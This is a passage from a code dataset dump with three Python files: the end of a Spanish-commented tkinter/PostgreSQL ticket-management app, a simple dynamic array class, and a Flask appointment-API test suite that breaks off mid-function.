total de ellos.\n self.TotalTickets.set(\n self.SubTotalTicketsBanco1.get() + self.SubTotalTicketsCartón.get())\n\n if self.tipoVentana == \"secundaria\":\n # Consultamos los datos para los widgets de mainframe1:\n resultDivisionesInicio = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_división, fecha, punto, ref_secuencia, monto, id_cliente from divisiones_hechas where id_división = %s\" % self.todosLosIdDivisión[self.posición])[0]\n self.idDivisión.set(resultDivisionesInicio[0])\n self.fecha.set(resultDivisionesInicio[1])\n self.punto.set(resultDivisionesInicio[2])\n self.ref_sec.set(resultDivisionesInicio[3])\n self.monto.set(resultDivisionesInicio[4])\n self.idCliente.set(resultDivisionesInicio[5])\n\n # Recuerde que ResultadoConsulta retorna una lista de listas, lo que acepta un tksheet.\n self.hojaTicketCartón.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cartón, monto from tickets_cartón_emitidos where id_división = %s\" % self.idDivisión.get()))\n\n # Y para el subtotal de los tickets cartones en que se dividió el ticket en iddivisión:\n self.SubTotalTicketsCartón.set(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from tickets_cartón_emitidos where id_división = %s\" % self.idDivisión.get())[0][0])\n\n # Para los botones de operación (inserción y actualización). Recuerde que para preparar los widget para insertar o actualizar, puede ser dentro de los lambda de este método, BotónPulsado:\n if args[0] == \"nuevo\":\n #Primero establecemos que estamos tratando con una operación de inserción de nuevo registro:\n self.tipoDeOperación = \"insertar\"\n #Inicializamos los widgets según el tipo de ventana limpiando sus variables de control:\n if self.tipoVentana == \"principal\":\n #Note que para borrar el texto en no_consig (analogamente para id división), lo tenemos que setear en 0, puesto que es de tipo entero y se pasa indefectiblemente como argumento a la función Actualizar_Insertar:\n self.no_consig.set(0)\n self.entregó.set(\"\")\n self.hojaTicketBanco1.set_sheet_data(data=[[]])\n self.hojaTicketCartón.set_sheet_data(data=[[]])\n # Seteamos los valores de los widget en mainframe4 a cero según el tipoVentana:\n self.SubTotalTicketsBanco1.set(0)\n self.SubTotalTicketsCartón.set(0)\n self.TotalTickets.set(0)\n else:\n self.idDivisión.set(0)\n self.ref_sec.set(\"\")\n self.monto.set(value=0)\n self.hojaTicketCartón.set_sheet_data(data=[[]])\n self.SubTotalTicketsCartón.set(0)\n \n self.HabilitarWidgets()\n #Habilitamos el botón de confirmar inserción:\n self.botónIngresar['state'] = 'enabled'\n #Fecha es común al tipo de ventana, así que va fuera del if. Para inserción hacemos un tratamiento específico para fecha. Fijese como meto la fecha actual en formato date de forma automática, y self.fecha que es la variable de control tkinter de la clase StringVar, la toma directamente.\n self.fecha.set(datetime.now().strftime(\"%Y-%m-%d\"))\n self.txtBoxFecha['state'] = 'readonly'\n \n if args[0] == \"actualización\": \n self.tipoDeOperación = \"actualizar\"\n self.HabilitarWidgets()\n self.botónConfirmUpDate['state'] = 'enabled'\n\n #Definimos lo métodos de actualización e inserción:\n def Actualizar(self, *args):\n \"Duré una semana atascado aquí para darme cuenta que tenía que hacer esta definición de método a parte, puesto que estaba usando este método como implementación lambda dentro del método BotónPulsado, y claro, me volvía a poner en la variable de control self.entregó, el valor original que está en la base de datos, puesto que cada vez que se invoca, resulConsigna allá arriba se vuelve a llenar con los valores que están establecidos en la base de datos, y los nuevo en los txtBoxEntregó y txtBoxFecha son volados por estos.\"\n #self.tipoDeOperación = \"actualizar\"\n self.Operación()\n self.DeshabilitarWidgets()\n \n def Insertar(self, *args):\n #self.tipoDeOperación = \"insertar\"\n self.Operación()\n self.DeshabilitarWidgets()\n #Tenemos que actualizar todosLosNoConsigna o todosLosNoIdDivisión según sea el caso:\n if self.tipoVentana == \"principal\":\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n else:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n #Nos pondrá en el último registro que será el recién ingresado, o el anterior último si no se da la inserción:\n self.BotónPulsado(\"último\")\n\n def Eliminar(self, *args):\n respuesta = messagebox.askyesno(\n message=\"Está a punto de eliminar este registro. Si le da a sí, lo borrará irreversiblemente.\", title=\"Borrar Registro\")\n if respuesta:\n if self.tipoVentana == \"principal\":\n Eliminación(self.conexiónParaTodaLaClase, self.tipoVentana,self.no_consig.get())\n else:\n Eliminación(self.conexiónParaTodaLaClase, self.tipoVentana,self.idDivisión.get())\n\n if self.tipoVentana == \"principal\":\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n else:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n\n self.BotónPulsado(\"último\")\n\n def HabilitarWidgets(self, *args):\n \"Trabaja conjuntamente con Operación, y posteriormente a este, DeshabilitarWidgets, y es el método que habilita todos los widgets pertinentes para la operación sobre ellos, sea actualización, inserción o eliminación de registros.\"\n # Deshabilitamos todos los botones de navegación, todos los widgets de mainframe3 o mainframe5 según sea insertar o actualizar:\n for widget in self.mainframe3.winfo_children(): widget['state'] = DISABLED\n for widget in self.mainframe5.winfo_children(): widget['state'] = DISABLED\n\n if self.tipoDeOperación == \"insertar\": self.botónNuevoRegis['state'] = DISABLED \n if self.tipoDeOperación == \"actualizar\": self.botónUpdate['state'] = DISABLED\n\n # Habilitamos los widgets comunes. Invisibilizamos self.txtBoxIdCliente y visibilizamos comboBoxIdCliente mientras actualizamos:\n self.txtBoxIdCliente.grid_remove()\n self.txtBoxFecha['state'] = 'enabled'\n\n # Metemos la lista de idClientes que existen actualmente en al tabla cliente:\n self.comboBoxIdCliente['values'] = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cliente from cliente\"))\n self.comboBoxIdCliente.grid()\n \n if self.tipoVentana == \"principal\":\n # Habilitamos los widgets en mainframe1 para este caso:\n self.txtBoxEntregó['state'] = 'enabled'\n # Habilitamos los tksheet:\n self.hojaTicketBanco1.enable_bindings(bindings=\"all\")\n self.hojaTicketCartón.enable_bindings(bindings=\"all\")\n if self.tipoDeOperación == \"actualizar\":\n #Con readonly_columns es que se bloquean las columnas. Puede ser un grupo de columnas (lista), referenciadas a partir de 0 para la primera:\n self.hojaTicketBanco1.readonly_columns(columns = [0], readonly = True, redraw = False)\n self.hojaTicketCartón.readonly_columns(columns = [0], readonly = True, redraw = False)\n \n if self.tipoVentana == \"secundaria\":\n # Removemos txtBoxPunto y lo sustituimos temporalmente por comboBoxPunto. Recuerde que ya hicimos lo propio con el combobox común, comboBoxIdCliente, al principio del método:\n self.txtBoxPunto.grid_remove()\n\n # Metemos la lista de puntos que existen actualmente cuentas:\n self.comboBoxPunto['values'] = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select banco from cuentas\"))\n self.comboBoxPunto.grid()\n\n # Habilitamos los widgets pertinentes de mainframe1:\n self.txtBoxRef_Sec['state'] = 'enabled'\n self.txtBoxMonto['state'] = 'enabled'\n self.hojaTicketCartón.enable_bindings(bindings=\"all\")\n if self.tipoDeOperación == \"actualizar\": self.hojaTicketCartón.readonly_columns(columns = [0], readonly = True, redraw = False)\n\n def DeshabilitarWidgets(self, *args):\n \"Este es el método para deshabilitar los widgets que se habián habilitado para hacer la operación según el tipo de operaciones y ventana. En pocas palabras, es la función inversa de HabilitarWidgets.\"\n # Deshabilitamos los widgets en mainframe1, independientemente del resultado de la actualización (procedente, no, cancel o excepción):\n for widget in self.mainframe1.winfo_children(): widget['state'] = 'readonly'\n \n # Rehabilitamos los botones en mainframe3 y mainframe5:\n for widget in self.mainframe3.winfo_children(): widget['state'] = 'enabled'\n for widget in self.mainframe5.winfo_children(): widget['state'] = 'enabled'\n\n #Haciendo la operación inversa de HabilitarWidgets, remuevo el comboBox común, comboBoxIdCliente, y revisibilizo a txtBoxIdCliente:\n self.comboBoxIdCliente.grid_remove()\n #Para refrescar txtBoxIdCliente, debo actualizar su variable de control, de lo contrario mostrará la que le había asignado antes BotónPulsado (recuerde que ese widget no se toco porque se había removido para darle paso al txtComboboxIdCliente). Igualmente para punto:\n self.idCliente.set(self.idClienteComboBox.get())\n self.txtBoxIdCliente.grid()\n\n #Para el nó común, si la ventana es de tipo secundaria:\n if self.tipoVentana == \"secundaria\":\n self.comboBoxPunto.grid_remove()\n self.punto.set(self.puntoComboBox.get())\n self.txtBoxPunto.grid()\n \n #Ahora deshabilitamos los widgets específicos según el tipo de ventana:\n if self.tipoVentana == \"principal\":\n # Deshabilitamos todos enlaces en los tksheets.\n self.hojaTicketBanco1.disable_bindings()\n self.hojaTicketCartón.disable_bindings()\n #Si se hizo una actulización, hay que volver a habilitar las columnas de tickets banco1 y cartón recibidos (readonly = True):\n if self.tipoDeOperación == \"actualizar\":\n #Con readonly_columns es que se bloquean las columnas. Puede ser un grupo de columnas (lista), referenciadas a partir de 0 para la primera:\n self.hojaTicketBanco1.readonly_columns(columns = [0], readonly = False, redraw = False)\n self.hojaTicketCartón.readonly_columns(columns = [0], readonly = False, redraw = False)\n if self.tipoVentana == \"secundaria\": \n self.hojaTicketCartón.disable_bindings()\n if self.tipoDeOperación == \"actualizar\":\n self.hojaTicketCartón.readonly_columns(columns = [0], readonly = False, redraw = False)\n\n #Por último, deshabilitamos los botones de ejecución de operación, independientemente de cual fue el tipo de operación:\n self.botónIngresar['state'] = DISABLED\n self.botónConfirmUpDate['state'] = DISABLED\n \n def Operación(self, *args):\n \"Este método fundamentalmente filtra el tipo de operación, mandando los parámetros pertinentes para ejecutar la operación sql demandada.\"\n respuesta = messagebox.askyesnocancel(\"Desea ejecutar la operación?\", \" Verifique la Entrada\")\n if respuesta is not None:\n if respuesta:\n #Primero, se debe elaborar las listaDelistas que se enviarán segun el caso. Son dos Actualización_Inserción: la de mainframe1, y la de los tksheet en mainframe2 (get_sheet_data):\n if self.tipoVentana == \"principal\":\n Actualización_Inserción(self.conexiónParaTodaLaClase, [[self.idClienteComboBox.get(), self.fecha.get(), self.entregó.get(), self.no_consig.get()]], self.tipoDeOperación, self.tipoVentana, \"mainframe1\")\n #Tenemos que validar que hallan datos en las hojas para poder actualizar-insertar en los tksheets de los tickets. Por ahora esta sirve parcialmente, mientras no se escriba y borre en una hoja determinada:\n if self.hojaTicketBanco1.get_sheet_data()[0] != []:\n Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketBanco1.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsBanco1\")\n if self.hojaTicketCartón.get_sheet_data()[0] != []:\n Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketCartón.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsCartón\")\n else:\n Actualización_Inserción(self.conexiónParaTodaLaClase, [[self.fecha.get(), self.puntoComboBox.get(), self.ref_sec.get(), self.monto.get(), self.idClienteComboBox.get(), self.idDivisión.get()]], self.tipoDeOperación, self.tipoVentana, \"mainframe1\")\n #Como sabemos en el caso de \"secundaria\", self.hojaTicketCartón será la de divisiones hechas (comparte el mísmo nombre que la de tickets recibidos):\n if self.hojaTicketCartón.get_sheet_data()[0] != []:\n Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketCartón.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsCartón\")\n\n def EmergenteDivisionesHechas(self, *args):\n # Debo crear el widget toplevel en bruto (cliente) y pasarlo como argumento a la instanciación de la clase GeometríaBase, para que esa instanciación de geometría le de forma al widget de tipo Toplevel pasado. Esa clase es un contratista que hace el trabajo de \"peluquear\" al widget Toplevel que pasé en bruto.\n self.top = Toplevel(self.ventanaParaTodaLaClase)\n self.top.grab_set() # El atributo método grab_set, monopoliza todos los eventos en el widget dónde se aplica, convirtiendolo de facto en modal. Esta forma es más concreta para convertir en modal un widget. Lo otro bueno de grab_set() es que al destruir el widget dónde lo apliqué para convertirlo en modal, el resto de las otras ventanas que estén abiertas quedan habilitadas automáticamente,\n # sin tener que crear código adicional para ello. Ojo: si aplico el atributo-método grab_set después de instanciar GeometríaBase para producir nuevaVentana, los widget contenidos en dicha ventana que usan a top como base no se configurarán en grab_set (grab: agarrarse para el sólo toda la atención, inhabilitando todo los demás widget que hayan), dejando que se puedan usar los widget en la ventana principal.\n # Y he aquí la magia de la autoinstanciación o instanciación recursiva:\n # Si no apunto-referencio la nueva instancia de widget de la clase GeometríaBase, no se visibilizará. Es por ello que el vscode no me lo subraya como \"variable no utilizada\", independientemente de que no invoque su atributo-metodo BotónPulsado allá abajo.\n self.nuevaVentana = GeometríaBase(\n self.top, self.conexiónParaTodaLaClase, \"secundaria\")\n # Y claro, la nueva instancia la inicializamos en la primera posición:\n self.nuevaVentana.BotónPulsado(\"primero\")\n\n # Finalmente creamos una primera y definitiva o última instancia \"de arranque\" y que durará toda la vida de la ejecución del programa, instanciando la clase GeometríaBase para comenzar:\n ventana = GeometríaBase(raíz, conexión, \"principal\")\n # A esa primera instancia, le invocamos su método BotónPulsado en primera posición para obtener los datos de las variables de control en los widgets, del primer registro en la tabla consignación (\"principal\"):\n ventana.BotónPulsado(\"primero\")\n raíz.mainloop()\n\nexcept (Exception, psycopg2.DatabaseError) as error:\n # Note como se le agrega texto al mensage del messagebox.\n messagebox.showerror(message=str(\n error)+\"Problemas en la conexión, el programa se cerrará.\", title='Error')\n\n# Si se logró conectar, cerrar la conexión antes de terminar el programa:\nif conexión is not None:\n conexión.close()\nprint(\"Conexión cerrada...chau.\")\n# 110521: 687 líneas. Será que logro llevarlas a la mitad? R:Eso no será posible, porque estoy condensando todo el código en una sóla clase, lo cual la hará más grande, pero el código global entre todos los módulos será mucho menor a la mitad.\n","sub_path":"CtrlTicket.py","file_name":"CtrlTicket.py","file_ext":"py","file_size_in_byte":49663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"12241118","text":"import ctypes\n\nclass DynamicArray:\n\n def __init__(self):\n self._size = 0\n self._capacity = 1\n self._arr = self._make_array(self._capacity)\n\n \"\"\" Returns the length of the array \"\"\"\n def __len__(self):\n return self._size\n\n ''' Returns the item at index i '''\n def __getitem__(self, i):\n if not 0 <= i < self._size:\n raise IndexError(\"Index out of bound\")\n return self._arr[i]\n\n ''' adds item to the end of the array '''\n def append(self, item):\n if self._size == self._capacity:\n self._resize(self._capacity * 2)\n self._arr[self._size] = item\n self._size += 1\n\n ''' private method to resize the array '''\n def _resize(self, c):\n temp = self._make_array(c)\n for i in range(self._size):\n temp[i] = self._arr[i]\n self._arr = temp\n self._capacity = c\n\n ''' private method to create an array of capacity c '''\n def _make_array(self, c):\n return (c * ctypes.py_object) ()\n\n ''' printing the array '''\n def __str__(self):\n temp = \"[\"\n for i in range(self._size - 1):\n temp += str(self._arr[i]) + \", \"\n temp += str(self._arr[self._size - 1]) + \"]\"\n return temp\n \nif __name__ == \"__main__\":\n a = DynamicArray()\n\n for i in range(10):\n a.append(i)\n print(a[i])\n\n","sub_path":"study/Arrays/DynamicArray.py","file_name":"DynamicArray.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635204536","text":"import json\nimport datetime as dt\nfrom dateutil import parser\nfrom project import db\nfrom project.test.test_base import TestBase\nfrom project.models.availability import Availability, create_availability\nfrom project.models.event import Event, add_event\nfrom project.models.user import User, add_user\nfrom project.models.appointment import Appointment, add_appointment\nfrom project.models.participant import Participant, create_participant\n# from calendar import NEXT_X_DAYS # TODO fix import and remove placeholder\nfrom unittest.mock import patch\n\nNEXT_X_DAYS = 90 # TODO this should be the exact same value as in\n# TODO appointment_handler.py\n\n\ndef create_appointment_json(start='2020-02-20T08:30:00Z',\n comments='Look forward to seeing you!',\n name='Little Timmy',\n email='timmy@mail.com') -> str:\n \"\"\"\n Creates and returns a JSON dump to POST an Appointment.\n :param start: start time of the event in ISO 8601\n :param comments: comments from the participant to the event creator\n :param name: the participant's name\n :param email: the participant's email\n :return: JSON dump\n \"\"\"\n request = {\n 'start': start,\n 'comments': comments,\n 'participant': {\n 'name': name,\n 'email': email\n }\n }\n return json.dumps(request)\n\n\nclass AppointmentGetAllTest(TestBase):\n def test_get_appointments(self):\n \"\"\"Tests whether appointments can be successfully requested.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n add_event(user_id=user.id, availability=create_availability())\n db.session.commit()\n event = Event.query.first()\n name = 'Jimmy Joe'\n comments = \"OMG I haven't seen you in forever Jimmy how has it been?\"\n start = dt.datetime.now(dt.timezone.utc)\n add_appointment(event_id=event.id,\n participants=[create_participant(name=name)],\n comments=comments,\n start=start)\n db.session.commit()\n auth_token = user.encode_auth_token(user.id)\n\n response = self.api.get(\n f'/users/{user.public_id}/events/{event.url}/'\n f'appointments',\n headers={'x-access-token': auth_token},\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n appointment = data[0]\n participants = appointment['participants'][0]\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(appointment['comments'], comments)\n self.assertEqual(participants['name'], name)\n self.assertEqual(parser.isoparse(appointment['start']), start)\n\n def test_get_all_appointments(self):\n \"\"\"Test Getting all appointments from a User\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n # Create 2 events\n event1 = add_event(user_id=user.id,\n availability=create_availability(),\n name=\"Frist Event\",\n url=\"my first url\")\n\n event2 = add_event(user_id=user.id,\n availability=create_availability(),\n name=\"Frist Second\",\n url=\"my second url\")\n db.session.commit()\n start = dt.datetime.now(dt.timezone.utc)\n # add appointment to event 1\n add_appointment(event_id=event1.id,\n participants=[\n create_participant(name=\"John\",\n email=\"john@test.com\")\n ],\n comments=\"comments\",\n start=start)\n # add appointment to event 2\n add_appointment(event_id=event2.id,\n participants=[\n create_participant(name=\"Bonnie\",\n email=\"Bonnie@test.com\")\n ],\n comments=\"comments\",\n start=start + dt.timedelta(days=1))\n db.session.commit()\n auth_token = user.encode_auth_token(user.id)\n\n resp_with_query_param = self.api.get(\n f'/users/{user.public_id}/appointments?event_url={event1.url}',\n headers={'x-access-token': auth_token},\n content_type='application/json')\n data_with_query = json.loads(resp_with_query_param.data.decode())\n\n\n resp_no_query_param = self.api.get(\n f'/users/{user.public_id}/appointments',\n headers={'x-access-token': auth_token},\n content_type='application/json')\n\n data_no_query_param = json.loads(resp_no_query_param.data.decode())\n\n\n self.assertEqual(len(data_with_query), 1)\n\n self.assertEqual(len(data_no_query_param), 2)\n\n def test_bad_token(self):\n \"\"\"Tests whether a request with an invalid token returns a 403\n response.\"\"\"\n add_user(email='test1@email.com')\n add_user(email='test2@email.com')\n db.session.commit()\n user1 = User.query.filter_by(email='test1@email.com').first()\n user2 = User.query.filter_by(email='test2@email.com').first()\n add_event(user1.id, create_availability())\n db.session.commit()\n event1 = Event.query.filter_by(user_id=user1.id).first()\n add_appointment(event_id=event1.id,\n participants=[create_participant()])\n db.session.commit()\n\n auth_token2 = user2.encode_auth_token(user2.id)\n route = f'/users/{user1.public_id}/events/{event1.url}/appointments'\n response = self.api.get(route,\n headers={'x-access-token': auth_token2},\n content_type='application/json')\n data = json.loads(response.data.decode())\n\n self.assertEqual(response.status_code, 403)\n self.assertEqual(data['message'],\n \"You do not have permission to access this content\")\n\n def test_missing_token(self):\n \"\"\"Tests whether a request with a missing token returns a 401\n response\"\"\"\n add_user(email='test1@email.com')\n db.session.commit()\n user = User.query.first()\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n add_appointment(event_id=event.id, participants=[create_participant()])\n db.session.commit()\n\n route = f'/users/{user.public_id}/events/{event.url}/appointments'\n response = self.api.get(route, content_type='application/json')\n data = json.loads(response.data.decode())\n\n self.assertEqual(response.status_code, 401)\n self.assertEqual(data['message'], 'Token is missing!')\n\n\n@patch('project.api.appointment_handler.send_email', return_value={})\n@patch('project.api.appointment_handler.create_google_event', return_value={'status': 200})\nclass AppointmentPostTest(TestBase):\n def test_post_appointments(self, _mock_email, _mock_event):\n \"\"\"Tests whether an appointment can be successfully created and the\n appointment's attributes match what was supplied.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = '2020-03-20T08:30:00Z'\n comments = \"I don't know about this appointment man...\"\n name = 'Little Timmy'\n email = 'little@timmy.com'\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=start,\n comments=comments,\n name=name,\n email=email)\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(data['message'], 'success')\n\n appointment = db.session.query(Appointment).\\\n filter(User.public_id == user_public_id,\n Event.url == event_url,\n Appointment.start == start).\\\n first()\n self.assertEqual(appointment.comments, comments)\n\n participant = appointment.participants[0]\n self.assertEqual(participant.name, name)\n self.assertEqual(participant.email, email)\n\n def test_start_after_next_x_days(self, _mock_email, _mock_event):\n \"\"\"Tests whether a request made with a start time that is more than\n NEXT_X_DAYS is rejected with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=91)\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n response = self.api.post(\n route,\n data=create_appointment_json(start=start.isoformat()),\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], f\"You may only schedule an \"\n f\"appointment within the next \"\n f\"{NEXT_X_DAYS} days in the future.\")\n\n def test_multiple_appointments(self, _mock_email, _mock_event):\n \"\"\"Tests whether a single participant can have multiple appointments.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n\n name = 'Fabulous Johnny'\n email = 'johnny@fabulous.com'\n start1 = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n start2 = start1 + dt.timedelta(hours=2)\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n response1 = self.api.post(route,\n data=create_appointment_json(\n start=start1.isoformat(),\n name=name,\n email=email),\n content_type='application/json')\n response2 = self.api.post(route,\n data=create_appointment_json(\n start=start2.isoformat(),\n name=name,\n email=email),\n content_type='application/json')\n\n data1 = json.loads(response1.data.decode())\n data2 = json.loads(response2.data.decode())\n self.assertEqual(response1.status_code, 201)\n self.assertEqual(data1['message'], 'success')\n self.assertEqual(response2.status_code, 201)\n self.assertEqual(data2['message'], 'success')\n\n appointments = db.session.query(Appointment).\\\n filter(Event.url == event_url).\\\n all()\n self.assertEqual(len(appointments), 2)\n for appointment in appointments:\n self.assertTrue(appointment.start in [start1, start2])\n\n participant = Participant.query.filter_by(email=email).all()\n self.assertEqual(len(participant), 1)\n self.assertEqual(participant[0].name, name)\n self.assertEqual(participant[0].email, email)\n\n def test_timezone_conversion(self, _mock_email, _mock_event):\n \"\"\"Tests whether non utc timezones are correctly converted to UTC time.\n \"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone(dt.timedelta(hours=-5)))\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=dt.datetime.isoformat(start))\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(data['message'], 'success')\n\n appointment = db.session.query(Appointment).\\\n filter(Event.url == event_url).\\\n first()\n self.assertEqual(appointment.start, start.astimezone(dt.timezone.utc))\n\n def test_availability_days(self, _mock_email, _mock_event):\n \"\"\"Tests whether a request outside of the available days is rejected\n with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability()) # Sunday: False\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(\n year=2020,\n month=3,\n day=1, # Sunday\n hour=9,\n tzinfo=dt.timezone.utc)\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments'\n request = create_appointment_json(start=dt.datetime.isoformat(start))\n response = self.api.post(route,\n data=request,\n content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], 'The provided start time and date is '\n 'not allowed please choose a valid '\n 'start time and date and resubmit '\n 'your request.')\n\n\nclass AppointmentGetTest(TestBase):\n def test_get_appointment(self):\n \"\"\"Tests whether an appointment can be successfully requested.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n name = 'Big Bob'\n email = 'bob@big.com'\n comments = 'What is this appointment for again?'\n start = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n add_appointment(\n event_id=event.id,\n participants=[create_participant(name=name, email=email)],\n start=start,\n comments=comments)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n response = self.api.get(route, content_type='application/json')\n\n appointment = json.loads(response.data.decode())\n participant = appointment['participants'][0]\n self.assertEqual(response.status_code, 200)\n self.assertEqual(appointment['comments'], comments)\n self.assertEqual(participant['name'], name)\n self.assertEqual(participant['email'], email)\n\n def test_appointment_not_found(self):\n \"\"\"Tests whether requesting an appointment that doesn't exist returns\n a 404 error.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime(year=2020,\n month=3,\n day=2,\n hour=9,\n tzinfo=dt.timezone.utc)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{(start + dt.timedelta(hours=1)).isoformat()}'\n response = self.api.get(route, content_type='application/json')\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(data['message'], 'No appointment was found for that '\n 'start time.')\n\n\nclass AppointmentPatchTest(TestBase):\n def test_update_appointment(self):\n \"\"\"Tests whether an appointment can be successfully updated.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = False\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['message'], 'success')\n\n appointment = Appointment.query.first()\n self.assertEqual(appointment.status, status)\n\n def test_updating_to_same_value(self):\n \"\"\"Tests whether updating a value to its current value is accepted.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start,\n status=True)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = True\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['message'], 'success')\n\n appointment = Appointment.query.first()\n self.assertEqual(appointment.status, status)\n\n def test_bad_value(self):\n \"\"\"Tests whether attempting to supply an unsupported value is\n rejected with a 400 response.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n start=start)\n db.session.commit()\n\n route = f'/users/{user_public_id}/events/{event_url}/appointments/' \\\n f'{start.isoformat()}'\n status = 'potato'\n response = self.api.patch(route,\n data=json.dumps({'status': status}),\n content_type='application/json')\n\n self.assertEqual(response.status_code, 400)\n\n data = json.loads(response.data.decode())\n self.assertEqual(data['errors']['status'],\n f\"'{status}' is not of type \"\n f\"'boolean'\")\n self.assertEqual(data['message'], 'Input payload validation failed')\n\n def test_bad_params(self):\n \"\"\"Tests whether a request with both valid and invalid parameters is\n accepted and the valid parameters are used.\"\"\"\n add_user()\n db.session.commit()\n user = User.query.first()\n user_public_id = user.public_id\n add_event(user.id, create_availability())\n db.session.commit()\n event = Event.query.first()\n event_url = event.url\n start = dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=30)\n add_appointment(event_id=event.id,\n participants=[create_participant()],\n 